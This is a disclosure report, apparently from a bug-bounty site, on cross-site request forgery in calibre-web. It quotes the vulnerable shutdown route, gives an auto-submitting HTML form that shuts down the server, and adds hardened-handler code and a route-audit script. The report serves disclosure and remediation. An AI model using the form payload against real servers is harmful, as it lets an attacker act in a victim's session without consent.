Cross-Site Request Forgery (CSRF) in janeczku/calibre-web

Valid

Reported on

Dec 17th 2021


Description

CSRF on various endpoints

Summary

CSRF protection was added to calibre-web only fairly recently. However, several state-changing endpoints are still reachable with a plain GET request instead of POST, so a cross-site link, image tag or GET form can trigger them in the victim's authenticated session.

The most impactful route found so far allows the whole server to be shut down (the victim needs an admin session, as the decorators show):

@admi.route("/shutdown")
@login_required
@admin_required
def shutdown():
    task = int(request.args.get("parameter").strip())
    showtext = {}
    if task in (0, 1):  # valid commandos received
        # close all database connections
        calibre_db.dispose()
        ub.dispose()

        if task == 0:
            showtext['text'] = _(u'Server restarted, please reload page')
        else:
            showtext['text'] = _(u'Performing shutdown of server, please close window')
        # stop gevent/tornado server
        web_server.stop(task == 0)
        return json.dumps(showtext)

    if task == 2:
        log.warning("reconnecting to calibre database")
        calibre_db.reconnect_db(config, ub.app_DB_path)
        showtext['text'] = _(u'Reconnect successful')
        return json.dumps(showtext)

And a number of lower-impact CSRF targets:

- Add a book to a shelf:

@shelf.route("/shelf/add/<int:shelf_id>/<int:book_id>")

- Delete a shelf:

@shelf.route("/shelf/delete/<int:shelf_id>")

And so on; the same file (shelf.py) has plenty of other endpoints without protection.

Proof of Concept

I'm leaving a PoC only for the first example, as all the payloads are almost the same:

<!-- PoC.html: the browser attaches the victim's calibre-web session cookie to this GET -->
<form id="csrf" action="http://127.0.0.1:8083/shutdown" method="GET">
<input type="hidden" name="parameter" value="1"/>
<input type="submit" value="Shutdown"/>
</form>
<!-- submit automatically, so merely opening the page is enough -->
<script>document.getElementById("csrf").submit();</script>

Possible remediation

All requests that change server or database state must be served only over POST (with GET rejected), so that a plain link, image or GET form can no longer trigger them, and those POST handlers must be covered by the CSRF protection.
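To show what that remediation looks like in practice, here is an added example (editor's code, not calibre-web's) that puts a handler shaped like the reported /shutdown route next to a hardened version. The handlers are plain WSGI callables rather than Flask views so the file runs with the standard library alone; stop_server, Session, ALLOWED_ORIGIN and make_environ are stand-ins and constructed test input, not project APIs. The hardened version rejects anything but POST, rejects a foreign Origin header when one is present, and requires a session-bound token that an attacker's page cannot read.

```python
import hmac
import io
import secrets
from urllib.parse import parse_qs

# Assumed deployment origin, taken from the PoC's target URL.
ALLOWED_ORIGIN = "http://127.0.0.1:8083"


def stop_server(task):
    """Stand-in for web_server.stop()/reconnect_db(): returns the action taken."""
    return {0: "restart", 1: "shutdown", 2: "reconnect"}[task]


class Session:
    """Minimal server-side session (assumed; a real app uses Flask's signed session)."""
    def __init__(self):
        # Per-session secret; the attacker's page cannot read it (same-origin policy).
        self.csrf_token = secrets.token_urlsafe(32)


def _params(environ):
    """Query string for GET, urlencoded body for POST, flattened to a dict."""
    if environ["REQUEST_METHOD"] == "POST":
        length = int(environ.get("CONTENT_LENGTH") or 0)
        raw = environ["wsgi.input"].read(length).decode()
    else:
        raw = environ.get("QUERY_STRING", "")
    return {k: v[0] for k, v in parse_qs(raw).items()}


def _run_task(params):
    task = int(params.get("parameter", "-1").strip())
    if task in (0, 1, 2):
        return 200, stop_server(task)
    return 400, None


def vulnerable_shutdown(environ, session):
    """Like the reported route: any method, parameter from the URL, no token.
    A cross-site <img src=".../shutdown?parameter=1"> or GET form is enough."""
    return _run_task(_params(environ))


def hardened_shutdown(environ, session):
    """Same action, but only over POST, from our own origin, with a session-bound token."""
    if environ["REQUEST_METHOD"] != "POST":
        return 405, None                       # GET/HEAD can no longer change state
    origin = environ.get("HTTP_ORIGIN")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return 403, None                       # defence in depth: cross-site POSTs carry Origin
    params = _params(environ)
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, session.csrf_token):
        return 403, None                       # missing or forged token
    return _run_task(params)


def make_environ(method, path, query="", body="", origin=None):
    """Build a minimal WSGI environ (constructed test input, not a real request)."""
    data = body.encode()
    env = {
        "REQUEST_METHOD": method,
        "PATH_INFO": path,
        "QUERY_STRING": query,
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(data)),
        "wsgi.input": io.BytesIO(data),
    }
    if origin is not None:
        env["HTTP_ORIGIN"] = origin
    return env


def demo():
    """Replay the PoC and a forged POST against both handlers; return the outcomes."""
    session = Session()
    # What PoC.html sends: a top-level GET navigation (browsers send no Origin here).
    poc_get = make_environ("GET", "/shutdown", query="parameter=1")
    # An attacker page upgraded to a POST form: cookie is attached, token is unknown.
    forged_post = make_environ("POST", "/shutdown",
                               body="parameter=1&csrf_token=guess",
                               origin="http://attacker.example")
    # The legitimate admin page: same-origin POST carrying the session's token.
    legit_post = make_environ("POST", "/shutdown",
                              body="parameter=1&csrf_token=" + session.csrf_token,
                              origin=ALLOWED_ORIGIN)
    return {
        "vulnerable_poc_get": vulnerable_shutdown(poc_get, session),
        "hardened_poc_get": hardened_shutdown(poc_get, session),
        "hardened_forged_post": hardened_shutdown(forged_post, session),
        "hardened_legit_post": hardened_shutdown(legit_post, session),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:>22}: {result}")
```

The method check alone defeats the posted PoC; the token check is what stops an attacker who simply switches the form to method="POST", since the browser still attaches the cookie but the page cannot obtain the token. The Origin comparison is an extra layer, not a substitute for the token, because Origin is absent on some requests.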

Impact

If an authenticated user (for /shutdown, an administrator) visits an attacker-controlled page, the attacker can perform state-changing actions in that user's session, up to shutting down the server.

P.s.

I'm not sure that I found all the vulnerable endpoints, so it's better to check all existing routes that allow GET.
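One way to do that check systematically is to parse the route decorators rather than grep for them. The following is an added example (editor's code, not part of the report or of calibre-web) that walks a source file with the ast module, treats any @<blueprint>.route(...) without a methods= argument as GET-only (Flask's default), and lists the GET-reachable routes whose path or handler name suggests a state change. SAMPLE_SOURCE is a constructed stand-in written in the style of the decorators quoted above, not the project's real files; the MUTATING_WORDS heuristic is an assumption and routes that serve both GET and POST still need a manual look at whether their GET branch mutates anything.

```python
import ast

# Constructed sample in the style of calibre-web's blueprint routes (not the project's code).
SAMPLE_SOURCE = '''
@admi.route("/shutdown")
@login_required
@admin_required
def shutdown():
    ...

@shelf.route("/shelf/add/<int:shelf_id>/<int:book_id>")
@login_required
def add_to_shelf(shelf_id, book_id):
    ...

@shelf.route("/shelf/delete/<int:shelf_id>")
@login_required
def remove_shelf(shelf_id):
    ...

@shelf.route("/shelf/<int:shelf_id>")
@login_required
def show_shelf(shelf_id):
    ...

@shelf.route("/shelf/edit/<int:shelf_id>", methods=["GET", "POST"])
@login_required
def edit_shelf(shelf_id):
    ...

@shelf.route("/shelf/remove/<int:shelf_id>/<int:book_id>", methods=["POST"])
@login_required
def remove_from_shelf(shelf_id, book_id):
    ...
'''

# Words in a path or handler name that usually mean the handler mutates state (assumed list).
MUTATING_WORDS = ("add", "delete", "remove", "edit", "update", "create",
                  "shutdown", "restart", "change", "toggle")


def _routes(func):
    """Yield (path, methods) for each @<blueprint>.route(...) decorator on a function."""
    for deco in func.decorator_list:
        if not (isinstance(deco, ast.Call) and isinstance(deco.func, ast.Attribute)
                and deco.func.attr == "route"):
            continue
        path = (deco.args[0].value
                if deco.args and isinstance(deco.args[0], ast.Constant) else "?")
        methods = ["GET"]  # Flask's default when methods= is absent
        for kw in deco.keywords:
            if kw.arg == "methods" and isinstance(kw.value, (ast.List, ast.Tuple)):
                methods = [str(e.value).upper() for e in kw.value.elts
                           if isinstance(e, ast.Constant)]
        yield path, methods


def find_get_mutators(source):
    """Return (path, handler, methods) for routes reachable over GET whose path or
    handler name suggests a state change; each one is a CSRF candidate to review."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        for path, methods in _routes(node):
            if "GET" not in methods:
                continue                      # POST-only: not triggerable by a link/img
            haystack = f"{path} {node.name}".lower()
            if any(word in haystack for word in MUTATING_WORDS):
                findings.append((path, node.name, methods))
    return findings


def audit_files(paths):
    """Run the scan over real files, e.g. audit_files(["admin.py", "shelf.py"])."""
    results = {}
    for path in paths:
        with open(path, encoding="utf-8") as fh:
            results[path] = find_get_mutators(fh.read())
    return results


if __name__ == "__main__":
    for path, name, methods in find_get_mutators(SAMPLE_SOURCE):
        print(f"{','.join(methods):<9} {path:<45} -> {name}")
```

On the sample this reports /shutdown, the shelf add and delete routes, and the GET+POST edit route, while skipping the read-only show_shelf and the POST-only remove_from_shelf. Point audit_files at the blueprint modules of the real tree to get the list the report asks for.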

Occurrences

Here I simply leave the whole file, as it has lots of vulnerable endpoints.

We are processing your report and will contact the janeczku/calibre-web team within 24 hours. 5 months ago
We have contacted a member of the janeczku/calibre-web team and are waiting to hear back 5 months ago
We have sent a follow up to the janeczku/calibre-web team. We will try again in 7 days. 5 months ago
janeczku validated this vulnerability 5 months ago
Scaramouche has been awarded the disclosure bounty
The fix bounty is now up for grabs
Scaramouche (Researcher), 4 months ago:

Could you please review this report as well? https://huntr.dev/bounties/499688c4-6ac4-4047-a868-7922c3eab369/

janeczku confirmed that a fix has been merged on 785726 4 months ago
The fix bounty has been dropped
admin.py#L132 has been validated
shelf.py#L0 has been validated